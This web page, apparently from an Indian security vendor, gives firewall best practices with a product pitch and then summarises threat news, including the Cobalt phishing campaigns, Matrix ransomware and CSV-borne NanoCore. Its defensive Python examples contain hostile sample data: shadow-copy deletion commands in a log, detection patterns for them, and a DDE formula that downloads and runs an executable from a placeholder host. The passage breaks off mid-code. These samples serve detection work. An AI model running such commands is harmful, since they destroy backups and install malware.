Cyber Security Company in India

You shall not pass!
Keep your network safe from hackers.

Your firewall is the first line of defense against security threats, but as you may already know, simply adding firewall devices and security modules to your network doesn’t by itself make the network more secure. You need to regularly watch and analyze your firewall’s syslogs and configuration, and optimize its rule base and performance, to protect your network.

The heart of any firewall’s performance is its rules and policies. If they are not managed properly, they can leave your network vulnerable to attack.

Gartner predicts that 99 percent of exploited vulnerabilities will continue to be ones known to security and IT professionals for at least one year. Gartner concludes that the best and cheapest way to mitigate cyber attacks caused by known vulnerabilities is to remove them altogether with regular patching.

For many security admins, maintaining optimal rule performance is a daunting task. Businesses are demanding that networks perform faster, leaving security admins balancing on the thin line separating speed and security. With these challenges in mind, here are some firewall best practices that can help security admins handle the conundrum of speed vs. security.

Firewall best practices

1. Document firewall rules and add comments to explain special rules.

It’s critical for everyone in an IT team to have visibility over all the rules that have been written. Along with the list of rules, it’s important to record:

  • The purpose of a rule.
  • The name of the security admin who wrote the rule, along with date of creation.
  • The users and services affected by the rule.
  • The devices and interfaces affected by the rule.
  • Rule expiration date.

You can record this information as comments when creating a new rule or modifying an existing rule. The first thing you should do, if you haven’t already, is review all the existing rules, and document the above information wherever possible. Though this might be a time-consuming task, you’ll only have to do it once, and it’ll end up saving you a lot of time when auditing and adding new rules in the long run.

2. Reduce over-permissive rules and include “deny all or deny rest” wherever necessary.

It’s better to be safe than sorry; it’s good practice to start off writing firewall rules with a “deny all” rule. This helps protect your network from manual errors. After testing and deploying the rules, include an explicit “deny rest” at the bottom, with logging enabled: on many platforms the implicit default deny is not logged, so an explicit final rule is what gives you visibility into blocked traffic. This ensures that your firewall allows only the required traffic and blocks the rest. You’ll also want to avoid over-permissive rules like “allow any”, as these put your network at risk.

Permissive rules give users more freedom, which can translate into granting users access to more resources than they need to perform business-related functions. This leads to two types of problems:

  • Under or overutilized network bandwidth.
  • Increased exposure to potentially malicious sites.

Restrict over-permissive rules, and avoid these issues altogether.

3. Review firewall rules regularly. Organize firewall rules to maximize speed and performance.

As years go by and new policies are defined by different security admins, the number of rules tends to pile up. When new rules are defined without analyzing the old ones, rules become redundant and can contradict each other, causing anomalies that negatively affect your firewall’s performance. Cleaning up unused rules on a regular basis helps avoid clogging up your firewall’s processor, so it’s important to periodically audit rules as well as remove duplicate rules, anomalies, and unwanted policies.

Placing the most used rules on top and moving the lesser-used rules to the bottom reduces the number of rules the firewall has to evaluate per packet, which improves its processing capacity. Because most firewalls apply the first matching rule, reorder only rules that cannot both match the same packet, or that take the same action on it; moving a rule above one it overlaps with changes the policy, not just its speed. This is an activity that should be performed periodically, as different types of rules are used at different times.
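As an added example (not code from the original page or from ManageEngine), the following Python script applies best practices 2 and 3 to a small constructed rule base: it reports any-to-any allow rules, rules with no comment, a missing final deny, and the shadowing, redundancy, generalization and correlation anomalies, and it checks whether two adjacent rules can swap places for hit rate without changing what the policy allows. The rule format, field names and the sample policy are this example’s own assumptions; it models a first-match IPv4 firewall and uses only the standard library.

```python
"""Static checks for a first-match firewall rule list (added example).
Flags shadowed / redundant / generalization / correlation anomalies,
any-to-any allow rules, undocumented rules and a missing final deny, and
says whether two adjacent rules may be reordered for hit rate safely.
Rule format and sample policy are constructed; IPv4 only, first match wins.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network
from typing import List, Optional, Tuple

PortRange = Optional[Tuple[int, int]]  # inclusive (low, high); None = any port
ANY_NET = IPv4Network("0.0.0.0/0")

@dataclass(frozen=True)
class Rule:
    name: str
    action: str        # "allow" or "deny"
    src: str           # IPv4 CIDR or "any"
    dst: str           # IPv4 CIDR or "any"
    proto: str         # "tcp", "udp", "icmp" or "any"
    dport: PortRange
    comment: str = ""  # purpose, owner, creation/expiry dates (practice 1)

@dataclass(frozen=True)
class Finding:
    kind: str
    rule: str
    other: str = ""    # the other rule involved, if any

def _net(cidr: str) -> IPv4Network:
    return ANY_NET if cidr == "any" else IPv4Network(cidr, strict=False)

def _ports(p: PortRange) -> Tuple[int, int]:
    return (0, 65535) if p is None else p

def covers(a: Rule, b: Rule) -> bool:
    """True when every packet matched by b is also matched by a."""
    if a.proto != "any" and a.proto != b.proto:
        return False
    if not _net(b.src).subnet_of(_net(a.src)) or not _net(b.dst).subnet_of(_net(a.dst)):
        return False
    (al, ah), (bl, bh) = _ports(a.dport), _ports(b.dport)
    return al <= bl and bh <= ah

def overlaps(a: Rule, b: Rule) -> bool:
    """True when at least one packet is matched by both a and b."""
    if "any" not in (a.proto, b.proto) and a.proto != b.proto:
        return False
    if not _net(a.src).overlaps(_net(b.src)) or not _net(a.dst).overlaps(_net(b.dst)):
        return False
    (al, ah), (bl, bh) = _ports(a.dport), _ports(b.dport)
    return al <= bh and bl <= ah

def is_any_any(r: Rule) -> bool:
    return r.src == "any" and r.dst == "any" and r.proto == "any" and r.dport is None

def can_swap(a: Rule, b: Rule) -> bool:
    """Adjacent rules may change places (to move the busier one up) without
    altering the policy only if no packet hits both, or both act the same."""
    return not overlaps(a, b) or a.action == b.action

def analyze(rules: List[Rule]) -> List[Finding]:
    findings: List[Finding] = []
    for i, r in enumerate(rules):
        if r.action == "allow" and is_any_any(r):
            findings.append(Finding("over-permissive", r.name))
        if not r.comment.strip():
            findings.append(Finding("undocumented", r.name))
        for earlier in rules[:i]:
            if covers(earlier, r):
                # r can never fire: the earlier rule always matches first
                kind = "redundant" if earlier.action == r.action else "shadowed"
                findings.append(Finding(kind, r.name, earlier.name))
            elif covers(r, earlier):
                # r is a broader catch-all for an earlier exception: a warning,
                # except for the intended final deny-all
                if earlier.action != r.action and not is_any_any(r):
                    findings.append(Finding("generalization", r.name, earlier.name))
            elif overlaps(earlier, r) and earlier.action != r.action:
                findings.append(Finding("correlation", r.name, earlier.name))
    if not rules or rules[-1].action != "deny" or not is_any_any(rules[-1]):
        findings.append(Finding("missing-final-deny", rules[-1].name if rules else ""))
    return findings

# Constructed sample policy that deliberately contains the mistakes above.
RULES = [
    Rule("web-in", "allow", "any", "10.0.1.0/24", "tcp", (443, 443),
         "public HTTPS to web tier; owner netsec; created 2019-02-01; expires 2020-02-01"),
    Rule("legacy-any", "allow", "any", "any", "any", None),  # any-to-any, no comment
    Rule("ssh-admin", "allow", "10.0.9.0/24", "10.0.1.0/24", "tcp", (22, 22),
         "jump host SSH to web tier; owner netsec"),
    Rule("block-db", "deny", "10.0.1.0/24", "10.0.2.0/24", "tcp", (3306, 3306),
         "web tier must not reach DB directly; owner dba"),
    Rule("web-to-db", "allow", "10.0.1.0/24", "10.0.2.0/24", "tcp", None,
         "temporary for migration; owner appteam; expires 2019-03-01"),
    Rule("web-in-dup", "allow", "10.20.0.0/16", "10.0.1.0/24", "tcp", (443, 443)),
]

if __name__ == "__main__":
    for f in analyze(RULES):
        print(f.kind, f.rule, f.other)
```

Run against the sample, the analyzer shows why a single “allow any” is so damaging: it makes every later allow rule redundant, shadows the deny rule beneath it, and the rule base still has no final deny. Removing it and appending a logged deny-all leaves only the real policy questions (the undocumented duplicate rule and the temporary allow that generalizes a deny).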

4. Check the health of your rules with a penetration test.

A penetration test is a simulated cyber attack against your computer system that checks for exploitable vulnerabilities. Just like how cars undergo crash tests to detect holes in the safety design, periodic penetration tests on your firewall will help you identify areas in your network’s security that are vulnerable.

5. Automate security audits.

A security audit is a manual or systematic measurable technical assessment of the firewall. Given that it consists of a combination of manual and automated tasks, auditing and recording the results of these tasks on a regular basis is essential. You need a tool that can both automate tasks and record results from manual tasks. This will help track how configuration changes impact the firewall.

6. Implement an end-to-end change management tool.

The key to efficient policy management is an end-to-end change management tool that can track and record requests from start to finish. A typical change procedure might involve the following steps:

End-to-end configuration change monitoring

User request => Request approval => Testing => Deployment => Validation

  • A user raises a request for a particular change.
  • The request is approved by the firewall or network security team, and all the details on who approves the request are recorded for future reference.
  • After approval, the configuration is tested to confirm whether changes in the firewall will have the desired effect without causing any threat to the existing setup.
  • Once the changes are tested, the new rule is deployed into production.
  • A validation process is performed to ensure that the new firewall settings are operating as intended.
  • All changes, reasons for changes, time stamps, and personnel involved are recorded.

7. Lay out an extensive, real-time alert management plan.

A real-time alert management system is critical for efficient firewall management. You need to:

  • Monitor the availability of the firewall in real time. If a firewall goes down, a standby firewall must take over immediately (typically a high-availability pair that synchronizes connection state) so that all traffic can be routed through it for the time being.
  • Trigger alarms when the system encounters an attack so that the issue can be quickly rectified.
  • Set alert notifications for all the changes that are made. This will help security admins keep a close eye on every change as it happens.

8. Retain logs as per regulations.

You need to retain logs for a stipulated amount of time depending on which regulations you need to comply with. Below are some of the major compliance standards along with the retention period required for each regulation.

Regulation    Retention requirement
PCI DSS       1 year
ISO 27001     3 years
NIST          3 years
NERC CIP      3 years
HIPAA         7 years
FISMA         3 years
GLBA          6 years
SOX           7 years

Different countries have different regulations on how long logs need to be stored for legal and auditing purposes, and the figures above are only a starting point: PCI DSS, for instance, requires at least one year of audit trail history with a minimum of three months immediately available for analysis, while frameworks such as ISO 27001 and NIST SP 800-53 leave the exact period to your own risk assessment. Check with your legal team which regulations your business needs to comply with, and configure the agreed period in your log management tool so that retention and purging happen automatically.

9. Periodically check for security compliance.

Regular internal audits, combined with compliance checks for different security standards, are important aspects of maintaining a healthy network. Every company will follow different compliance standards based on the industry that business is in. You can automate compliance checks and audits to run on a regular basis to ensure you’re meeting industry standards.

10. Upgrade your firewall software and firmware.

No network or firewall is perfect, and hackers are working around the clock to find any loopholes they can. Regular software and firmware updates to your firewall help eliminate known vulnerabilities in your system. Not even the best set of firewall rules can stop an attack if a known vulnerability hasn’t been patched.

 

Firewall Analyzer can help in adhering to these firewall best practices.

1. Rule Management:

Policy Overview: Manually documenting all firewall rules and reviewing them on a regular basis is an arduous and time-consuming task. To solve this issue, you can use Firewall Analyzer to fetch the entire set of rules written for your firewall. To simplify review, you can also filter rules on the following criteria:

• Allowed and denied rules.
• Inbound and outbound rules.
• Inactive rules.
• Rules with logging disabled.
• Over-permissive, any-to-any rules.

Policy Optimization: Firewall Analyzer’s Policy Optimization feature identifies shadow rules, redundancy, generalization, correlation, and grouping anomalies. These anomalies negatively impact firewall performance, and removing them will help you optimize rule efficiency.

Rule Reorder: Firewall Analyzer provides suggestions on rule position by correlating the number of rule hits with rule complexity and anomalies. It can estimate the performance improvement for a suggested change.

Rule Cleanup: Firewall Analyzer provides a detailed list of all unused firewall rules, objects, and interfaces. The Rule Cleanup feature gives you a high-level overview of which rules, objects, and interfaces can be removed or deactivated. As you can see, Firewall Analyzer doesn’t just provide visibility into firewall rules; its in-depth Rule Optimization and Rule Reorder reports help in removing rule anomalies and inefficiencies in rule performance. Together these reports help in:

• Documenting firewall rules.
• Reviewing firewall rules.
• Optimizing firewall performance.
• Organizing firewall rules to maximize speed.

2. Configuration Change Management: Firewall Analyzer fetches configuration changes from firewall devices and generates a Change Management report.

This report helps you find who made what changes, when, and why. Firewall Analyzer also sends real-time alerts to your phone when changes happen. This report ensures that all configurations and subsequent changes made in your firewall are captured periodically and stored in a database.

With a combination of ManageEngine’s ServiceDesk Plus for ticketing and Firewall Analyzer for monitoring configuration changes, security admins gain end-to-end change monitoring. This type of end-to-end change monitoring system is critical for avoiding security events caused by human error.

3. Compliance Reports: Firewall Analyzer generates out-of-the-box compliance reports for the following industry standards:

  • Payment Card Industry Data Security Standard (PCI DSS)
  • ISO 27001:2013
  • Firewall best practices
  • NIST Special Publication 800-53
  • NERC’s Critical Infrastructure Protection (CIP) Standards
  • SANS Institutes’ Firewall Checklist

With these reports, you can track your firewall devices’ compliance status in terms of configurations.

4. Configuration Security Audits: Firewall Analyzer can perform security audits on the configuration setup of your firewall and provide detailed reports on any security loopholes. Firewall Analyzer also provides the severity of loopholes, ease of attack due to these loopholes, and a recommendation on how to fix reported issues.

5. Alarm Management: With Firewall Analyzer, you can set alarm notifications for both security and traffic incidents. Firewall Analyzer monitors syslogs and sends out a notification whenever an alarm threshold is crossed. Alert notifications can be sent via email or SMS. Firewall Analyzer’s alarms help you identify security and traffic events as soon as they occur.

6. Log Retention: With Firewall Analyzer, you can either retain logs in the database or the archive. You can also set a time period for log retention to save disk space and improve performance; after all, disk space requirements can exceed 10TB if log data needs to be retained for a full year.

Continuously monitoring and reviewing your firewall rules, configuration and logs play an important role in securing your network.

IT Monteur uses ManageEngine’s Firewall Analyzer to help you:

  • Document and review firewall rules.
  • Organize firewall rules to maximize speed.
  • Monitor all configuration changes made to the firewall.
  • Perform forensic analysis on firewall logs.
  • Set alarm notifications for traffic and security anomalies.
  • Generate compliance reports and perform security audits.

To maintain your firewall rules and adhere to these best practices, please contact us:

Sales :+91 958 290 7788 | Support : 0120 2631048


The tale of the prolific Cobalt threat group’s massive phishing campaigns against financial institutions

  • The cybercriminal group ‘Cobalt’ is named after the penetration testing tool ‘Cobalt Strike’ it uses.
  • The threat group has targeted several banks and financial institutions across countries such as Armenia, Bulgaria, Belarus, Estonia, Georgia, Kyrgyzstan, Moldova, the Netherlands, Poland, Romania, Russia, Spain, Britain, Malaysia, and more.

Cobalt group was first spotted in 2016. The cybercriminal group has been named after the penetration testing tool ‘Cobalt Strike’ used by them to move from infected computers in banks’ networks to specialized servers that control ATM machines.

The group’s alleged leader was arrested in Spain in March 2018 for attacks on almost 100 banks across 40 countries that stole over 1 billion Euros. The malware and tools used by the threat group include Cobalt Strike, CobInt, SpicyOmelette, the ThreadKit exploit builder kit, and More_eggs.

Cobalt group’s attack against ATM machines

In November 2016, cybercriminals raided ATM machines across Europe using the technique known as ‘jackpotting’, which forces infected ATMs to dispense cash by installing malware on the machine’s computer. The attack affected Diebold Nixdorf and NCR Corp, two of the world’s largest ATM makers.

This attack has affected almost 14 countries including Armenia, Bulgaria, Belarus, Estonia, Georgia, Kyrgyzstan, Moldova, the Netherlands, Poland, Romania, Russia, Spain, Britain, and Malaysia. Researchers noted that this attack has been conducted by a threat actor group named Cobalt.

Cobalt targeted banks via a spear phishing campaign

In November 2017, the Cobalt group targeted banks via a spear phishing campaign. The phishing emails sent to targeted banks contained RTF attachments with an exploit for CVE-2017-8759. Once a victim opened the attachment, the exploit downloaded and executed the Cobalt Strike tool, which then connected to the command and control server operated by the Cobalt gang.

Later the same month, after the CVE-2017-8759 RCE campaign, the Cobalt group started targeting banks and financial institutions with phishing emails containing RTF attachments with an exploit for CVE-2017-11882.

Cobalt group revealed its targets – Intentionally or Accidentally?

In its spear phishing campaign against banks with RTF attachments, the Cobalt group put the targets’ email addresses in the email’s ‘To:’ field instead of the BCC field. By doing so, the group let researchers and the other recipients know who the campaign’s targets were. Whether the group made this error accidentally or intentionally remains unknown.

Cobalt group arrested but resumes attacks against banks with Cobint malware

The alleged leader of the Cobalt group was arrested in Spain in March 2018 for attacks on 100 banks across 40 countries that stole over 1 billion Euros. However, the Cobalt gang continued its attacks against banks. A campaign observed in May 2018 used the ‘CobInt’ malware to target bank employees in Russia and the Commonwealth of Independent States via phishing emails.

The phishing emails purported to come from a “leading antivirus company” and stated that the bank’s systems were in violation of the law. The emails urged recipients to download the attachment and read the document. Upon opening the attachment, the ‘CobInt’ malware infected the bank’s computer system.

Three phishing campaigns in May-July 2018

In the first campaign, the phishing emails purported to be from the European Banking Federation contained a malicious PDF file. This malicious file persuades victims into downloading a weaponized RTF file that contains three exploits. The attackers dropped a JScript backdoor called More_eggs which allowed the attackers to gain remote control of the targeted system.

The second campaign started on June 19 with phishing emails containing a malicious URL. Upon clicking, the malicious URL redirected the victim to a malicious Word doc, which in turn, triggered the infection chain. The targeted organization in this campaign was a major ATM and payment systems manufacturer.

The third campaign, which began on July 10, saw the attackers targeting various businesses with phishing emails sent along with a malicious RTF file packed with exploits that triggered the infection chain.

Cobalt gang distributed SpicyOmelette malware

In September 2018, the Cobalt threat actor group used a new Remote Access Trojan (RAT) dubbed SpicyOmelette to target banks worldwide. This malware is a JavaScript RAT and comes packed with multiple detection-evading features. SpicyOmelette is also capable of stealing system information, checking for antivirus tools and installing additional malware into the system.

The Cobalt Group’s new malware ‘SpicyOmelette’ was used as part of the initial intrusion stage in an attack. The malware was delivered via phishing emails containing a malicious PDF document. When the victim clicked the link in the PDF, it redirected them to an Amazon Web Services (AWS) URL controlled by the Cobalt group, from which the SpicyOmelette malware was installed and executed on the victim’s system.

Cobalt was spotted using an updated version of Threadkit exploit kit

In October 2018, researchers spotted the Cobalt group leveraging a new version of ThreadKit, a Microsoft Office document exploit builder kit it had previously used in its 2017 attacks.

ThreadKit documents were distributed via phishing emails containing an RTF Microsoft Office attachment built with the evolved version of the kit. Researchers noted that CobInt, the payload ThreadKit delivers, now has an added layer of obfuscation: an XOR routine decodes the initial payload, making it harder to detect.

Australia parliament hit by cyber-hack attempt

Authorities in Australia say they are investigating an attempt to hack into its parliament’s computer network.

Lawmakers said there was “no evidence” that information had been accessed or stolen, but politicians’ passwords have been reset as a precaution.

Local cyber-security experts have suggested the hack likely came from a foreign state.

Australian PM Scott Morrison said he didn’t intend to comment in depth on “the source or nature of this”.

He said there was “no suggestion” that government agencies or departments had been targeted. MPs and their staff use the parliament network to store emails, among other data.


Earlier, senior lawmakers said there was no evidence that the hacking attempt aimed to “disrupt or influence electoral or political processes”.

However, opposition leader Bill Shorten described the incident as a “wake-up call”. It also sparked commentary from other lawmakers.

The Australian government has faced a number of cyber-attacks in recent years, some of which have been attributed in local media to nations such as China.

In 2015 and 2016, there were high-profile attacks on the government’s weather and statistics agencies. In 2011, senior Australian ministers also had their email systems breached.

“It looks like another nation state is behind this attack as well,” said Fergus Hanson of the Australian Strategic Policy Institute, a Canberra-based think tank.

“You would be having access to swathes of correspondence between politicians, staffers and people who run Parliament House – lots of juicy information there.”

Longest DDoS attack since 2015 lasts 329 hours

While the number of DDoS attacks has declined, they have become much more sophisticated, according to a Kaspersky Lab report.

The last quarter of 2018 saw the longest DDoS attack since 2015, lasting 329 hours—almost 2 weeks—according to a Kaspersky Lab report released on Thursday. But the top three countries with the most DDoS attacks are still the same: China in first place (43%), the US in second (29%), and Australia in third (6%).

While the number of DDoS attacks decreased in 2018, the average attack duration increased, the report found. The average length of attacks more than doubled from the beginning of 2018 to the end—from 95 minutes to 218 minutes. These attacks increased in length because they have become more complex and difficult to stop or mitigate, the report added.

The most common complex attack executed included an HTTP component, which requires both time and money to launch, the report said. Both the HTTP flood method and mixed attacks involving an HTTP factor made up approximately 80% of all DDoS attacks for 2018, revealing the success of this strategy.

Since attacks are predicted to become even more specialized in 2019, the report recommended the following three steps to help protect organizations from DDoS attacks:

  • Train and increase IT employees’ awareness of how to respond to DDoS attacks.
  • Prepare the organization’s websites and web applications to handle high traffic volume.
  • Use professional solutions to protect systems against all varieties of DDoS attacks.

The big takeaways for tech leaders:

  • While DDoS attacks decreased in 2018, the complexity of the attacks increased. — Kaspersky Lab, 2019
  • DDoS attacks will only become more complex and specialized in 2019, meaning the enterprise needs to properly prepare. — Kaspersky Lab, 2019

MATRIX RANSOMWARE CHANGES THE RULES AGAIN | HOW MUCH ARE YOU WORTH?

As noted in the SentinelOne-sponsored EMA Security Megatrends 2019 report, the two greatest threats currently facing enterprise are ransomware and ATAs, advanced targeted attacks that have been designed for a specific environment. The last two years have seen an increase in both kinds of threats, as well as their combination: targeted ransomware such as Ryuk, SamSam, and now Matrix.

Matrix variants have been observed before, but a recent report notes that Matrix has moved firmly into the targeted realm. This development suggests they have taken lessons from their malware brothers-in-arms and have even added a new twist, as we explain in this post.

The Matrix Ransomware

Matrix reaches endpoints through Windows Remote Desktop (RDP), most likely by brute-forcing the passwords of internet-exposed machines to gain entry and then spread.

On execution, the malware looks for and encrypts certain types of files, as shown below:

Image of Matrix filetype extensions

The Matrix ransomware obfuscates the original filename and appends its own custom extension to it, typically with either an email address-style syntax such as .[RestoreFile@qq.com] or an uppercase suffix such as .MTXLOCK. At least 30 different file extensions are known, and there is no known public decryptor for the Matrix malware at this time.

As is common with ransomware, Matrix attempts to delete the snapshots automatically created by Windows Volume Shadow Copy service (VSS) to prevent the user or backup software from easily restoring to a known good point.
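The two behaviours just described, RDP password guessing and shadow copy deletion, are exactly the kind of thing a SOC can alert on before the ransom stage. The following Python is an added example (not SentinelOne’s code) that runs that detection over a constructed batch of Windows Security events (IDs 4625 and 4688) flattened to key=value lines; the line format, field names, the five-failures-in-five-minutes threshold and the command-line patterns are this example’s assumptions.

```python
"""Detection logic for RDP brute forcing and shadow copy deletion.

Added example, not SentinelOne's code.  Input is a constructed batch of
Windows Security events flattened to key=value lines (fields from event
4625, logon failure, and 4688, process creation, as winlogbeat or a SIEM
would forward them).  Thresholds and patterns are this example's choices.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Command lines that remove or starve shadow copies: vssadmin and wmic are
# the classic ones; resize shadowstorage forces old copies to be dropped.
SHADOW_WIPE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]

# Constructed sample: six failed RDP logons from one address in 14 seconds,
# one unrelated network-logon failure, a success, then shadow copy wiping.
SAMPLE_LOG = r"""
ts=2019-02-11T02:14:01 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.9
ts=2019-02-11T02:14:03 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.9
ts=2019-02-11T02:14:05 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.9
ts=2019-02-11T02:14:08 EventID=4625 LogonType=3 TargetUserName=svc_sql IpAddress=198.51.100.7
ts=2019-02-11T02:14:10 EventID=4625 LogonType=10 TargetUserName=sysadmin IpAddress=203.0.113.9
ts=2019-02-11T02:14:12 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.9
ts=2019-02-11T02:14:15 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.9
ts=2019-02-11T02:14:20 EventID=4624 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.9
ts=2019-02-11T02:31:42 EventID=4688 SubjectUserName=administrator NewProcessName=C:\Windows\System32\vssadmin.exe CommandLine="vssadmin.exe delete shadows /all /quiet"
ts=2019-02-11T02:31:43 EventID=4688 SubjectUserName=administrator NewProcessName=C:\Windows\System32\wbem\WMIC.exe CommandLine="wmic shadowcopy delete"
"""

def parse_events(text: str) -> List[Dict[str, str]]:
    """One dict per non-empty line; quoted values keep their spaces."""
    return [{k: v.strip('"') for k, v in FIELD_RE.findall(line)}
            for line in text.splitlines() if line.strip()]

def detect_rdp_bruteforce(events: List[Dict[str, str]], threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Alert once per source IP that produces `threshold` failed RDP logons
    (4625 with LogonType 10) inside a sliding `window`."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged, alerts = set(), []
    for ev in events:
        if ev.get("EventID") != "4625" or ev.get("LogonType") != "10":
            continue
        ip, ts = ev.get("IpAddress", "-"), datetime.fromisoformat(ev["ts"])
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append({"type": "rdp-bruteforce", "source": ip,
                           "count": len(q), "last": ev["ts"]})
    return alerts

def detect_shadow_copy_deletion(events: List[Dict[str, str]]) -> List[dict]:
    """Alert on any process creation whose command line wipes shadow copies."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4688":
            continue
        cmd = ev.get("CommandLine", "")
        if any(p.search(cmd) for p in SHADOW_WIPE):
            alerts.append({"type": "shadow-copy-deletion", "ts": ev["ts"],
                           "user": ev.get("SubjectUserName", "-"), "command": cmd})
    return alerts

def run(text: str) -> List[dict]:
    events = parse_events(text)
    return detect_rdp_bruteforce(events) + detect_shadow_copy_deletion(events)

if __name__ == "__main__":
    for alert in run(SAMPLE_LOG):
        print(alert)
```

On the sample the brute-force alert fires at the fifth failure, a quarter of an hour before vssadmin runs; that gap is the window in which blocking the source address or disabling the account stops the encryption from ever starting. Process creation auditing with command-line logging (or Sysmon event 1) has to be enabled for the second detector to see anything.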

The Matrix Revolution

At this point in any ransomware story, you would normally expect there to be a ransom note demanding a certain amount of bitcoin. But that’s where the Matrix ransomware shakes things up. The malware authors have dispensed with the convention of a ransom note demanding a specific fee in cryptocurrency. Instead, they aim to capitalise on their tactic of using a targeted attack.

The criminals first ask the victim to send a few samples of their encrypted files, between 3 and 5, along with the KEYIDS.KLST file deposited by the malware on the victim’s Desktop. The attackers then privately decrypt the user’s files, determining who the victim is and what kind of data they are likely to have lost. They then contact the victim with a ransom demand, presumably based on their evaluation of the victim’s resources and the value of the data.

As we pointed out earlier, this is particularly brutal on the enterprise. In a typical opportunistic ransomware attack, the attackers have no idea – and little concern – who their victims are or what data have been rendered inaccessible. Everybody gets hit for the same amount. The Matrix ransomware instead sets a variable price based on the attackers’ own assessment of the worth of the victim. The bigger the fish, the bigger the prize. Although one researcher posing as a victim reported that the criminals became increasingly desperate and started lowering their demand as time went on, it’s not certain that they would follow the same pattern with an enterprise victim.

The Matrix malware authors have also potentially started a new trend by demanding the bitcoin equivalent of a dollar amount rather than a fixed bitcoin amount. This puts the problem of fluctuations in cryptocurrency value firmly in the buyer’s court. Concern about volatile prices could also indicate the criminals intend to cash out in the short-term.

Matrix Reloaded

Some reports suggest that Matrix ransomware attempts to disable Sophos security software. That’s not uncommon these days. Time was, most malware would rather abort than take on AV software head-to-head; the risk of getting its signatures caught and publicly disseminated was too great. But times have changed. Security solutions that rely on that kind of technology have become less intimidating to malware authors. The prize of execution is too great, particularly with AV bypasses and vulnerabilities becoming increasingly well known.

Here at SentinelOne, we decided to load up the Matrix and give it a run for its (or our?) money. We even decided to give it a head start. We set the SentinelOne policy to its weaker “detect only” setting rather than the usual “Protect” policy which blocks the malware automatically without user intervention. With the “detect only” policy, the SentinelOne agent only issues a warning on detection, but otherwise allows malware to execute as the authors intended. If you’re wondering why we would load ransomware onto one of our endpoints and let it encrypt all our files, watch the video to find out!

Conclusion

As the video demonstrates, SentinelOne and the endpoint it was protecting came out the clear winners. With no loss of data and immediate rollback, SentinelOne customers can be assured that they are protected from targeted attacks by Matrix ransomware. Even better, customers using SentinelOne on the default “Protect” policy would see the automated detection and response block the ransomware on the local machine.


Attackers rely on Google Sheets to spread malware through CSV files

  • The malware appears to be a variant of the infamous NanoCore trojan.
  • CSV files containing the malware payload circumvent Google filters using Google Sheets as a distribution method.

A unique piece of malware that uses Google Sheets has been discovered by the well-known cyber security researcher Marco Ramilli. The malware appears to be an improved version of the NanoCore RAT first detected in 2014. It seems that attackers write malicious formulas in the cells of CSV files so that opening the file infects the system with the malware.

Ramilli, who received a spam mail containing this CSV file, mentioned that one of the cells held an executable command. “A series of empty fields preceding a final and fake formula piping a CMD.exe command is spawned. By using the bitsadmin technique the attacker downloads a file called now.exe and stores it into a temporary system folder for later execution,” he said.

Google Sheets as a malware vector

Earlier, attackers relied on desktop applications such as Microsoft Excel, LibreOffice and Apache OpenOffice because they supported Dynamic Data Exchange (DDE). This feature/bug was the main vector for threat actors. OpenOffice and LibreOffice patched this vulnerability in versions 4.1.1 and 4.3.1 respectively.

However, Microsoft Excel only introduced two user warnings, while still allowing this malicious behavior to exist. The warnings in Microsoft Excel are not effective enough as they only ask the users if they trust the source of the file.

In case of files shared through Google Sheets, normal users are likely to consider the file trustworthy, thus exposing themselves to the malware lying in the file if they download and open it locally with Excel.

Modus Operandi

The attackers bypass Google’s security filters by injecting the malicious formula into CSV files, which Google does not scan heavily. They then share this file with unsuspecting users, asking them to download it and open it in Microsoft Excel, citing compatibility issues.

Many users fall for this trick and download the file to open it locally on their device. Thus, Google Sheets acts as a malware dropper. As soon as they open it locally, Microsoft Excel becomes the malware executor.
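As an added example (not Marco Ramilli’s code), here is a Python scanner and sanitiser for the CSV injection described above. It flags every cell that Excel would evaluate as a formula, singles out DDE-style cells that launch a program, and neutralises them with the single-quote prefix so the sheet opens as plain text. The sample CSV, its placeholder URL and the list of program names treated as DDE targets are constructed for this example.

```python
"""Scan a CSV for spreadsheet formula injection and neutralise it.

Added example, not Marco Ramilli's code.  A cell beginning with = + - @
(or a tab or carriage return) is evaluated as a formula when the file is
opened in Excel; the DDE form =cmd|'/c ...'!A0 launches a program once the
user clicks through Excel's two warnings.  The scanner reports every
formula cell and singles out DDE / program-launching ones; the sanitiser
prefixes offending cells with a single quote so Excel keeps them as text
(the OWASP CSV-injection remedy).  Sample file and URL are constructed.
"""
import csv
import io
import re
from typing import List, Tuple

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# DDE invocation (=prog|'topic'!item), the DDE() function, or a known
# program name right after the trigger.  Extend the list as needed.
DDE_RE = re.compile(
    r"^[=+\-@]\s*(cmd|powershell|msiexec|mshta|rundll32|regsvr32)\b"
    r"|\|\s*'|\bDDE\s*\(", re.I)

SAMPLE_CSV = (
    "invoice,amount,note\r\n"
    "INV-1001,-250.00,refund\r\n"
    'INV-1002,300.00,"=HYPERLINK(""http://example.invalid/x"",""details"")"\r\n'
    # empty fields, then one formula piping cmd.exe, as in the spam sample
    ",,,,,,,,=cmd|'/C bitsadmin /transfer j http://example.invalid/now.exe "
    "%TEMP%\\now.exe & %TEMP%\\now.exe'!A0\r\n"
)

def _is_number(s: str) -> bool:
    try:
        float(s.replace(",", ""))
        return True
    except ValueError:
        return False

def classify_cell(cell: str) -> str:
    """'safe', 'formula' (starts with a trigger) or 'dde' (launches a program)."""
    if not cell or cell[0] not in FORMULA_TRIGGERS:
        return "safe"
    if cell[0] in "+-" and _is_number(cell):   # signed numbers are not formulas
        return "safe"
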